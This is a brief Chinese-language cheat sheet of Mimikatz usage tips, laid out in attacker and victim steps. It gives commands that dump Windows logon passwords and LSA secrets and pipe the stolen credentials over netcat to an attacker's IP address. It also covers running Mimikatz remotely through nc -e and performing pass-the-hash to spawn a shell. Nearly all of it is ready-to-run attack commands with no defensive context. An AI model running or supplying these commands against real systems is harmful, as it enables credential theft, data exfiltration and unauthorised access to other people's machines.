Mimikatz 使用Tips
1.记录 Mimikatz输出:
C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
2.将输出导入到本地文件:
C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
3.将输出传输到远程机器:
Attacker执行:
E:\>nc -lvp 4444
Victim执行:
C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv
192.168.52.1 4444
192.168.52.1 为Attacker IP
4.通过nc远程执行Mimikatz:
Victim执行:
C:\>nc -lvp 443
Attacker执行:
E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe
192.168.52.128 为Victim IP
5.hash传递
Privilege::debug
sekurlsa::pth /domain:xxxx /user:xxxxx /ntlm:xxxxxx
之后会弹出cmd。
6.获得PPTP口令
mimikatz.exe privilege::debug token::elevate lsadump::secrets exit